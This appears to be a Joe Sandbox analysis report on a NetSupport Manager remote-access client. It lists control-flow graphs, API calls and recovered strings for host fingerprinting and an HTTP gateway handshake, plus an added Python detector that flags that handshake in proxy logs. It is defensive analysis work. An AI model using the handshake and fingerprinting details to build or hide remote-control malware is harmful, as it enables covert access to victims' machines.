2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                      • API String ID: 1099283604-2655008560
                                                                                      • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                      • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                      • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                      • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1128 1102db00-1102db50 call 1110f420 1131 1102db52-1102db66 call 11142a60 1128->1131 1132 1102db68 1128->1132 1134 1102db6e-1102dbb3 call 11142290 call 11142ac0 1131->1134 1132->1134 1140 1102dd53-1102dd62 call 11144dc0 1134->1140 1141 1102dbb9 1134->1141 1147 1102dd68-1102dd78 1140->1147 1142 1102dbc0-1102dbc3 1141->1142 1145 1102dbc5-1102dbc7 1142->1145 1146 1102dbe8-1102dbf1 1142->1146 1148 1102dbd0-1102dbe1 1145->1148 1149 1102dbf7-1102dbfe 1146->1149 1150 1102dd24-1102dd3d call 11142ac0 1146->1150 1151 1102dd7a 1147->1151 1152 1102dd7f-1102dd93 call 1102cc10 1147->1152 1148->1148 1153 1102dbe3 1148->1153 1149->1150 1154 1102dcf3-1102dd08 call 11162de7 1149->1154 1155 1102dc05-1102dc07 1149->1155 1156 1102dd0a-1102dd1f call 11162de7 1149->1156 1157 1102dc9a-1102dccd call 111618c1 call 11142290 1149->1157 1158 1102dcdb-1102dcf1 call 11164010 1149->1158 1159 1102dc8b-1102dc95 1149->1159 1160 1102dccf-1102dcd9 1149->1160 1161 1102dc4c-1102dc52 1149->1161 1162 1102dc7c-1102dc86 1149->1162 1150->1142 1180 1102dd43-1102dd45 1150->1180 1151->1152 1176 1102dd98-1102dd9d 1152->1176 1153->1150 1154->1150 1155->1150 1167 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1155->1167 1156->1150 1157->1150 1158->1150 1159->1150 1160->1150 1169 1102dc54-1102dc68 call 11162de7 1161->1169 1170 1102dc6d-1102dc77 1161->1170 1162->1150 1167->1150 1169->1150 1170->1150 1182 1102de43-1102de5d call 111463d0 1176->1182 1185 1102dda3-1102ddc8 call 110b7920 call 11146450 1176->1185 1180->1182 1183 1102dd4b-1102dd51 1180->1183 1195 1102deb3-1102debf call 1102b4f0 1182->1195 1196 1102de5f-1102de78 call 1105dd10 1182->1196 1183->1140 1183->1147 1203 1102ddd3-1102ddd9 1185->1203 1204 1102ddca-1102ddd1 1185->1204 1208 1102dec1-1102dec8 1195->1208 1209 1102de98-1102de9f 1195->1209 1196->1195 1207 1102de7a-1102de8c 1196->1207 1210 1102dddb-1102dde2 call 11027d60 1203->1210 1211 1102de39 1203->1211 1204->1182 1207->1195 1223 1102de8e 1207->1223 1212 1102dea5-1102dea8 1208->1212 1214 1102deca-1102ded4 1208->1214 1209->1212 1213 1102e0aa-1102e0cb GetComputerNameA 1209->1213 1210->1211 1222 1102dde4-1102de16 1210->1222 1211->1182 1219 1102deaa-1102deb1 call 110b7920 1212->1219 1220 1102ded9 1212->1220 1216 1102e103-1102e109 1213->1216 1217 1102e0cd-1102e101 call 11027c30 1213->1217 1214->1213 1225 1102e10b-1102e110 1216->1225 1226 1102e13f-1102e152 call 11164010 1216->1226 1217->1216 1247 1102e157-1102e163 1217->1247 1227 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1219->1227 1220->1227 1240 1102de20-1102de2f call 110f6080 1222->1240 1241 1102de18-1102de1e 1222->1241 1223->1209 1230 1102e116-1102e11a 1225->1230 1246 1102e347-1102e36a 1226->1246 1276 1102e07a-1102e082 SetLastError 1227->1276 1277 1102dfbc-1102dfd3 1227->1277 1237 1102e136-1102e138 1230->1237 1238 1102e11c-1102e11e 1230->1238 1245 1102e13b-1102e13d 1237->1245 1243 1102e132-1102e134 1238->1243 1244 1102e120-1102e126 1238->1244 1249 1102de32-1102de34 call 1102d330 1240->1249 1241->1240 1241->1249 1243->1245 1244->1237 1251 1102e128-1102e130 1244->1251 1245->1226 1245->1247 1261 1102e392-1102e39a 1246->1261 1262 1102e36c-1102e372 1246->1262 1256 1102e165-1102e17a call 110b7920 call 11029bd0 1247->1256 1257 1102e17c-1102e18f call 11081a70 1247->1257 1249->1211 1251->1230 1251->1243 1282 1102e1d3-1102e1ec call 11081a70 1256->1282 1273 1102e191-1102e1b4 1257->1273 1274 1102e1b6-1102e1b8 1257->1274 1265 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1261->1265 1266 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1261->1266 1262->1261 1264 1102e374-1102e38d call 1102d330 1262->1264 1264->1261 1266->1265 1273->1282 1275 1102e1c0-1102e1d1 1274->1275 1275->1275 1275->1282 1286 1102e043-1102e04f 1276->1286 1277->1286 1298 1102dfd5-1102dfde 1277->1298 1300 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1282->1300 1301 1102e32c-1102e339 call 11164010 1282->1301 1290 1102e092-1102e0a1 1286->1290 1291 1102e051-1102e05d 1286->1291 1290->1213 1294 1102e0a3-1102e0a4 FreeLibrary 1290->1294 1296 1102e06f-1102e073 1291->1296 1297 1102e05f-1102e06d GetProcAddress 1291->1297 1294->1213 1303 1102e084-1102e086 SetLastError 1296->1303 1304 1102e075-1102e078 1296->1304 1297->1296 1298->1286 1302 1102dfe0-1102e016 call 11146450 call 1112b270 1298->1302 1340 1102e283-1102e299 call 11128ec0 1300->1340 1341 1102e26f-1102e27e call 11029450 1300->1341 1318 1102e33c-1102e341 CharUpperA 1301->1318 1302->1286 1323 1102e018-1102e03e call 11146450 call 11027920 1302->1323 1309 1102e08c 1303->1309 1304->1309 1309->1290 1318->1246 1323->1286 1345 1102e2b2-1102e2ec call 110d0bd0 * 2 1340->1345 1346 1102e29b-1102e2ad call 110d0bd0 1340->1346 1341->1340 1353 1102e302-1102e32a call 11164010 call 110d07c0 1345->1353 1354 1102e2ee-1102e2fd call 11029450 1345->1354 1346->1345 1353->1318 1354->1353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc_memsetwsprintf
                                                                                      • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$051829$14/03/16 10:38:31 V12.10F8$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                      • API String ID: 3802068140-1050804309
                                                                                      • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                      • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                      • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                      • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1780 6c5e3d00-6c5e3d42 call 6c5f1c50 call 6c5e3b80 1784 6c5e3d47-6c5e3d4f 1780->1784 1785 6c5e3d6c-6c5e3d6e 1784->1785 1786 6c5e3d51-6c5e3d6b call 6c5f28e1 1784->1786 1788 6c5e3d87-6c5e3da1 call 6c5d8fb0 1785->1788 1789 6c5e3d70-6c5e3d84 call 6c5d6f50 1785->1789 1795 6c5e3dc5-6c5e3e44 call 6c5d5e90 * 2 call 6c5e7be0 call 6c5d5e20 lstrlenA 1788->1795 1796 6c5e3da3-6c5e3dc4 call 6c5d63c0 call 6c5f28e1 1788->1796 1789->1788 1809 6c5e3e98-6c5e3fbe call 6c5d5500 call 6c5d6050 call 6c5e7c70 * 2 call 6c5e7d00 * 3 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5e7d00 gethostname call 6c5e7d00 call 6c5db8e0 1795->1809 1810 6c5e3e46-6c5e3e95 call 6c5ed8b0 call 6c5d5060 call 6c5d4830 call 6c5f1bfd 1795->1810 1845 6c5e3fc5-6c5e3fe1 call 6c5e7d00 1809->1845 1846 6c5e3fc0 1809->1846 1810->1809 1849 6c5e3ff8-6c5e3ffe 1845->1849 1850 6c5e3fe3-6c5e3ff5 call 6c5e7d00 1845->1850 1846->1845 1852 6c5e421a-6c5e4263 call 6c5e7b60 call 6c5f1bfd call 6c5d98d0 call 6c5e77e0 1849->1852 1853 6c5e4004-6c5e4022 call 6c5d5e20 1849->1853 1850->1849 1881 6c5e4265-6c5e4291 call 6c5da4e0 call 6c5f28e1 1852->1881 1882 6c5e4292-6c5e42aa call 6c5f28e1 1852->1882 1859 6c5e405a-6c5e4084 call 6c5d5e20 1853->1859 1860 6c5e4024-6c5e4057 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd 1853->1860 1870 6c5e408a-6c5e41ce call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd 1859->1870 1871 6c5e41d1-6c5e4217 call 6c5e7d00 call 6c5d5e20 call 6c5e7d00 1859->1871 1860->1859 1870->1871 1871->1852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: *Dept$*Gsk$051829$1.1$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                      • API String ID: 2102423945-1357414646
                                                                                      • Opcode ID: 6d435d229b3b4486908d5cddf25466578f610b9cc7e2ac30755706ff97e1e4e5
                                                                                      • Instruction ID: 78ceed8447a9ae39e8a9817248ff21eb9eee86c501455ac377cf3cee1fdc15f7
                                                                                      • Opcode Fuzzy Hash: 6d435d229b3b4486908d5cddf25466578f610b9cc7e2ac30755706ff97e1e4e5
                                                                                      • Instruction Fuzzy Hash: D0E1A7B2D0021CAACB24DB68DC81FEF7779DF99206F4045D5E50963A41DB30AF888FA5
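The format strings recovered from this function (CMD=OPEN, CLIENT_ADDR=%s, CLIENT_NAME=%s, CLIENT_VERSION=1.0, HOSTNAME=%s, PORT=%d, PROTOCOL_VER=%u.%u, MAXPACKET=%d, APPTYPE=%d, CMPI=%u, GSK=%s, DEPT=%s, CHATID=%s, A1..A4) are the key=value fields the NetSupport client assembles when it opens a session through its HTTP gateway, and the build path e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c places the code in the gateway control module. The detector below is an added example for this report, not code from Joe Sandbox or NetSupport: it parses such a body out of a captured HTTP POST and only fires on the open handshake, not on any page that happens to post CMD=OPEN. Assumptions: fields are one per line, CRLF or LF terminated (the report shows the format strings but not the separator), and the sample bodies are constructed placeholders, not real captures.

```python
from typing import Dict, List

# Field names taken from the format strings recovered from this function
# (CLIENT_ADDR=%s, CLIENT_NAME=%s, HOSTNAME=%s, PORT=%d, PROTOCOL_VER=%u.%u, ...).
HANDSHAKE_KEYS = {
    "CMD", "CLIENT_ADDR", "CLIENT_NAME", "CLIENT_VERSION", "HOSTNAME", "PORT",
    "PROTOCOL_VER", "MAXPACKET", "APPTYPE", "CMPI", "GSK", "DEPT", "CHATID",
    "A1", "A2", "A3", "A4",
}


def parse_gateway_body(body: bytes) -> Dict[str, object]:
    """Split a key=value body into known fields and a list of unknown keys.

    Assumption: one field per line, CRLF or LF terminated (the report shows the
    field format strings but not the separator).
    """
    fields: Dict[str, str] = {}
    unknown: List[str] = []
    for raw in body.replace(b"\r\n", b"\n").split(b"\n"):
        line = raw.strip()
        if not line or b"=" not in line:
            continue
        key, _, value = line.partition(b"=")
        key = key.decode("ascii", "replace").strip().upper()
        if key in HANDSHAKE_KEYS:
            fields[key] = value.decode("latin-1").strip()
        else:
            unknown.append(key)
    return {"fields": fields, "unknown": unknown}


def is_netsupport_open(parsed: Dict[str, object]) -> bool:
    """True when the body looks like the client's CMD=OPEN gateway handshake.

    CMD=OPEN alone is too generic for an alert, so also require a version
    marker and at least one host identifier from the recovered field set.
    """
    fields = parsed["fields"]
    if fields.get("CMD", "").upper() != "OPEN":
        return False
    has_version = "CLIENT_VERSION" in fields or "PROTOCOL_VER" in fields
    has_host = any(k in fields for k in ("HOSTNAME", "CLIENT_NAME", "CLIENT_ADDR"))
    return has_version and has_host


def indicators(parsed: Dict[str, object]) -> Dict[str, str]:
    """Pull the fields an analyst pivots on: victim host, internal address,
    client listen port, protocol version and whether a gateway key was sent."""
    f = parsed["fields"]
    return {
        "hostname": f.get("HOSTNAME", f.get("CLIENT_NAME", "")),
        "client_addr": f.get("CLIENT_ADDR", ""),
        "port": f.get("PORT", ""),
        "protocol_ver": f.get("PROTOCOL_VER", ""),
        "gsk_present": "yes" if f.get("GSK") else "no",
    }


# Constructed sample body, not a real capture; every value is a placeholder.
SAMPLE_OPEN = (
    b"CMD=OPEN\r\nCLIENT_VERSION=1.0\r\nPROTOCOL_VER=12.10\r\n"
    b"HOSTNAME=WORKSTATION-01\r\nCLIENT_NAME=WORKSTATION-01\r\n"
    b"CLIENT_ADDR=10.0.0.15\r\nPORT=5421\r\nMAXPACKET=65535\r\n"
    b"APPTYPE=1\r\nCMPI=0\r\nGSK=AAAABBBB\r\nDEPT=\r\n"
)
# A benign form post that happens to contain CMD=OPEN must not fire.
SAMPLE_BENIGN = b"CMD=OPEN\r\nfile=report.pdf\r\n"

if __name__ == "__main__":
    for name, body in (("open", SAMPLE_OPEN), ("benign", SAMPLE_BENIGN)):
        parsed = parse_gateway_body(body)
        print(name, is_netsupport_open(parsed), indicators(parsed))
```

The CLIENT_ADDR and PORT values are what the victim reports about itself (its internal address and the TCP listen port from the client configuration), so they are worth extracting from proxy logs even when the gateway host is already known: they tell you which internal machine to pull, and on which port a direct TCPIP session could also be reached.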

                                                                                      Control-flow Graph: function 110a9c90-110a9f52 (graph image not reproduced). Win32 APIs reached from this graph: LoadLibraryA, GetProcAddress, SetupDiGetClassDevsA, SetupDiDestroyDeviceInfoList, CreateFileA, GetLastError, SetLastError, FreeLibrary.
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(setupapi.dll,A1BC2D8B,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                      • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                      • _free.LIBCMT ref: 110A9D60
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                      • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                      • _malloc.LIBCMT ref: 110A9DB3
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                      • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                      • GetLastError.KERNEL32 ref: 110A9E21
                                                                                      • _free.LIBCMT ref: 110A9E33
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                      • _free.LIBCMT ref: 110A9E64
                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                      • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                      • API String ID: 3464732724-3340099623
                                                                                      • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                      • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                      • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                      • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

                                                                                      Control-flow Graph: function 11133920-11133c9f (graph image not reproduced). Win32 APIs reached from this graph: GetLocalTime, LoadLibraryA, GetCurrentProcess, GetProcAddress, GetProcessHandleCount, K32GetProcessMemoryInfo, SetLastError, FreeLibrary.
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,A1BC2D8B), ref: 1113398E
                                                                                      • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                      • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                      • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                      • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                      • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                      • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                      • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                      • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                      • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                      • API String ID: 263027137-1001504656
                                                                                      • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                      • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                      • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                      • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                      Control-flow Graph: function 1102dbc0-1102e438 (graph image not reproduced). Win32 APIs reached from this graph: GetComputerNameA, LoadLibraryA, GetProcAddress, SetLastError, FreeLibrary, wsprintfA, GetCurrentProcessId, CharUpperA.
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: $051829$14/03/16 10:38:31 V12.10F8$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                      • API String ID: 1029625771-1446895765
                                                                                      • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                      • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                      • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                      • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

                                                                                      Control-flow Graph

                                                                                      APIs
